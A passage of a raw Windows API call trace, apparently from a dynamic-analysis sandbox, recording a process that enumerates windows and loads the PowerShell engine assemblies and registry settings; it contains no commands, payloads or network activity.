returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4f0 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.432] GetLastError () returned 0x0 [0130.432] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x454 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x7f4 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x1013e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x69c [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4a4 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x6b8 [0130.433] GetLastError () returned 0x0 [0130.433] GetWindowThreadProcessId (in: hWnd=0x1401b0, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x9b0 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x101e6, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x201b6, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x94c [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x20216, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x570 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x890 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x880 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x870 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x860 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x850 [0130.434] GetLastError () returned 0x0 [0130.434] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x840 [0130.434] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x830 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x820 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x810 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x768 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x364 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x3f0 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x6bc [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x23c [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x578 [0130.435] GetLastError () returned 0x0 [0130.435] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x57c [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4b4 [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x764 [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x120 [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x50160, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x64c [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x40158, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x1c4 [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x4015e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x210 [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x3010c, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x7f8 [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5ec [0130.436] GetLastError () returned 0x0 [0130.436] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5fc [0130.436] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x5c0 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x594 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x730 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x528 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x1010e, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x614 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x4f0 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x464 [0130.437] GetLastError () returned 0x0 [0130.437] GetWindowThreadProcessId (in: hWnd=0x20024, lpdwProcessId=0x2de880 | out: lpdwProcessId=0x2de880) returned 0x7f4 [0130.437] GetLastError () returned 0x0 [0130.437] GetLastError () returned 0x0 [0130.438] WerSetFlags () returned 0x0 [0130.443] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0130.444] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x2dec5c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x2dec58 | out: pulNumLanguages=0x2dec5c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x2dec58) returned 1 [0130.444] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x2dec5c, pwszLanguagesBuffer=0x2bee19c, pcchLanguagesBuffer=0x2dec58 | out: pulNumLanguages=0x2dec5c, pwszLanguagesBuffer=0x2bee19c, pcchLanguagesBuffer=0x2dec58) returned 1 [0130.447] GetUserDefaultLocaleName (in: lpLocaleName=0x3da558, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0130.480] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.480] GetLastError () returned 0xcb [0130.483] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.483] GetLastError () returned 0xcb [0130.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.484] GetLastError () returned 0xcb [0130.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.492] GetLastError () returned 0xcb [0130.492] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.492] GetLastError () returned 0xcb [0130.492] SetErrorMode (uMode=0x1) returned 0x1 [0130.492] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x2deb68 | out: lpFileInformation=0x2deb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0130.493] GetLastError () returned 0xcb [0130.493] SetErrorMode (uMode=0x1) returned 0x1 [0130.493] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x2debec | out: lpdwHandle=0x2debec) returned 0x94c [0130.494] GetLastError () returned 0x0 [0130.494] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bf06cc | out: lpData=0x2bf06cc) returned 1 [0130.495] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2debb8, puLen=0x2debb4 | out: lplpBuffer=0x2debb8*=0x2bf0768, puLen=0x2debb4) returned 1 [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf0844, puLen=0x2deb30) returned 1 [0130.496] lstrlenW (lpString="Microsoft Corporation") returned 21 [0130.496] lstrcpyW (in: lpString1=0x3da558, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf0898, puLen=0x2deb30) returned 1 [0130.496] lstrlenW (lpString="System.Management.Automation") returned 28 [0130.496] lstrcpyW (in: lpString1=0x3da558, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf08f4, puLen=0x2deb30) returned 1 [0130.496] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.496] lstrcpyW (in: lpString1=0x3da558, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf0934, puLen=0x2deb30) returned 1 [0130.496] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.496] lstrcpyW (in: lpString1=0x3da558, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf099c, puLen=0x2deb30) returned 1 [0130.496] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0130.496] lstrcpyW (in: lpString1=0x3da558, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf0a38, puLen=0x2deb30) returned 1 [0130.496] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0130.496] lstrcpyW (in: lpString1=0x3da558, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0130.496] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf0a9c, puLen=0x2deb30) returned 1 [0130.497] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0130.497] lstrcpyW (in: lpString1=0x3da558, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0130.497] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf0b18, puLen=0x2deb30) returned 1 [0130.497] lstrlenW (lpString="6.1.7601.17514") returned 14 [0130.497] lstrcpyW (in: lpString1=0x3da558, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0130.497] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x2bf07c0, puLen=0x2deb30) returned 1 [0130.497] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0130.497] lstrcpyW (in: lpString1=0x3da558, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0130.497] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x0, puLen=0x2deb30) returned 0 [0130.497] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x0, puLen=0x2deb30) returned 0 [0130.497] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x2deb34, puLen=0x2deb30 | out: lplpBuffer=0x2deb34*=0x0, puLen=0x2deb30) returned 0 [0130.497] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x2deb28, puLen=0x2deb24 | out: lplpBuffer=0x2deb28*=0x2bf0768, puLen=0x2deb24) returned 1 [0130.497] VerLanguageNameW (in: wLang=0x0, szLang=0x3da558, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0130.498] VerQueryValueW (in: pBlock=0x2bf06cc, lpSubBlock="\\", lplpBuffer=0x2deb3c, puLen=0x2deb38 | out: lplpBuffer=0x2deb3c*=0x2bf06f4, puLen=0x2deb38) returned 1 [0130.504] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.504] GetLastError () returned 0xcb [0130.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.536] GetLastError () returned 0xcb [0130.539] lstrlenW (lpString="䅁") returned 1 [0130.541] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x2deb00 | out: phkResult=0x2deb00*=0x31c) returned 0x0 [0130.542] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x2deb04 | out: phkResult=0x2deb04*=0x320) returned 0x0 [0130.542] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2deb38 | out: phkResult=0x2deb38*=0x324) returned 0x0 [0130.544] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2deb78, lpData=0x0, lpcbData=0x2deb74*=0x0 | out: lpType=0x2deb78*=0x1, lpData=0x0, lpcbData=0x2deb74*=0x56) returned 0x0 [0130.545] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2deb78, lpData=0x3da558, lpcbData=0x2deb74*=0x56 | out: lpType=0x2deb78*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2deb74*=0x56) returned 0x0 [0130.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.548] GetLastError () returned 0x0 [0130.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.549] GetLastError () returned 0x0 [0130.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de680, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0130.565] GetLastError () returned 0x0 [0130.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0130.652] GetLastError () returned 0xcb [0131.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.412] GetLastError () returned 0x2 [0131.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0131.412] GetLastError () returned 0x2 [0131.740] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.740] GetLastError () returned 0xcb [0131.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.741] GetLastError () returned 0xcb [0131.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.770] GetLastError () returned 0xcb [0131.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.771] GetLastError () returned 0xcb [0131.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0131.771] GetLastError () returned 0xcb [0132.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0132.124] GetLastError () returned 0x0 [0132.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0132.124] GetLastError () returned 0x0 [0132.202] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0132.202] GetLastError () returned 0xcb [0132.236] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3da558, nSize=0x80 | out: lpBuffer="") returned 0x0 [0132.236] GetLastError () returned 0xcb [0132.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0132.316] GetLastError () returned 0x7e [0132.316] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0132.316] GetLastError () returned 0x7e [0133.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0133.607] GetLastError () returned 0x2 [0133.607] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86 [0133.607] GetLastError () returned 0x2 [0133.801] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.801] GetLastError () returned 0x57 [0133.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c [0133.802] GetLastError () returned 0x57 [0134.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x2de640, lpFilePart=0x0 | out: 